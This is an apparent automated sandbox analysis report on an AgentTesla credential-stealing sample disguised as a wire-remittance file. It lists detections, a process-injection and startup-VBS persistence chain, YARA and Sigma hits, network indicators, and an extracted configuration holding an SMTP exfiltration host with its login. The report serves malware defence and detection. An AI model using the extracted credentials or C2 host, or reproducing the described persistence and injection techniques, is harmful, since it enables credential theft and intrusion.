
Windows Analysis Report
Wire Remittance Detail.exe

Overview

General Information

Sample name: Wire Remittance Detail.exe
Analysis ID: 1635011
MD5: 834a1e4418d9543bcbb76aa9bd15fece
SHA1: 94d13721934655c477647509025346d1b7e93344
SHA256: 4587101c910c2af014b4f604c0ba76717c1c8b3f360ce0a191e81158b691f6cc
Tags: AgentTesla, exe, user-cocaman

Detection

AgentTesla
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Wire Remittance Detail.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\Wire Remittance Detail.exe" MD5: 834A1E4418D9543BCBB76AA9BD15FECE)
    • InstallUtil.exe (PID: 6236 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 3580 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • AssemblyFullName.exe (PID: 6916 cmdline: "C:\Users\user\AppData\Roaming\AssemblyFullName.exe" MD5: 834A1E4418D9543BCBB76AA9BD15FECE)
      • InstallUtil.exe (PID: 7136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Extracted malware configuration: {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "web@iaa-airferight.com", "Password": "webmaster"}
Source | Rule | Description | Author | Strings
00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.1105377682.0000000005B50000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(26 entries in total; first 5 shown)

Source | Rule | Description | Author | Strings
0.2.Wire Remittance Detail.exe.5b50000.9.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Wire Remittance Detail.exe.442f68a.2.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Wire Remittance Detail.exe.44aee70.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.Wire Remittance Detail.exe.44aee70.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.Wire Remittance Detail.exe.44aee70.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x316ef:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31761:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x317eb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3187d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x318e7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31959:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x319ef:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31a7f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
(14 entries in total; first 5 shown)

                    System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , ProcessId: 3580, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 6236, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49682
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs" , ProcessId: 3580, ProcessName: wscript.exe

                    Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\Wire Remittance Detail.exe, ProcessId: 6892, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs
                    No Suricata rule has matched


                    AV Detection

Source: Wire Remittance Detail.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: 2.2.InstallUtil.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "web@iaa-airferight.com", "Password": "webmaster"}
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Virustotal: Detection: 54%
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | ReversingLabs: Detection: 55%
Source: Wire Remittance Detail.exe | Virustotal: Detection: 54%
Source: Wire Remittance Detail.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Wire Remittance Detail.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49681 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49685 version: TLS 1.2
Source: Wire Remittance Detail.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000041F0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000041F0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 4x nop then jmp 063F5610h (5_2_063F5558)
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 4x nop then jmp 063F5610h (5_2_063F5550)
Source: Joe Sandbox View | IP Address: 46.175.148.58
Source: Joe Sandbox View | IP Address: 104.26.13.205
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | TCP traffic: 192.168.2.10:49682 -> 46.175.148.58:25
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: mail.iaa-airferight.com
                    Source: InstallUtil.exe, 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.iaa-airferight.com
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49681 -> 443

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, abAX9N.cs | .Net Code: OPnJT

                    System Summary

Source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063F6E78 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063FA830 NtResumeThread
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063F6E71 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063FA828 NtResumeThread
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Code function: 0_2_0301EB28
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Code function: 0_2_0301A920
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Code function: 0_2_0301A930
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Code function: 0_2_0301B2C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_015341C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_0153E480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_0153A947
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_01534A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_0153DCB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_01533E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069D5588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069D65E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069D7D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069DB20F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069D3040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069D7688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069D5CD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069DE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069D0338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069D234A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_069D0006
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_02F3EB28
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_02F3A930
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_02F3A920
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_02F3B2C8
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063EF5A0
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063EF2D0
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063EDCF8
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063F3A38
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063F3A28
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063F5F28
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063F5F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_00EEE6A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_00EEA94F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_00EE4A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_00EE3E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_00EE41C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_062FA25C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_062FB880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_06305588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_063065E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_0630B20F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_06303040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_06307D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_06307688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_063002BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_0630234B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_0630E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_06300007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_06305CD3
Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameZedcnnrkti.exe6 vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004121000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBjrpmivvqlf.dll" vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1104044099.00000000058B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameBjrpmivvqlf.dll" vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1081981434.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamec5ea4fda-43b2-4fc0-8a8b-07958574f042.exe4 vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamec5ea4fda-43b2-4fc0-8a8b-07958574f042.exe4 vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe | Binary or memory string: OriginalFilenameZedcnnrkti.exe6 vs Wire Remittance Detail.exe
Source: Wire Remittance Detail.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
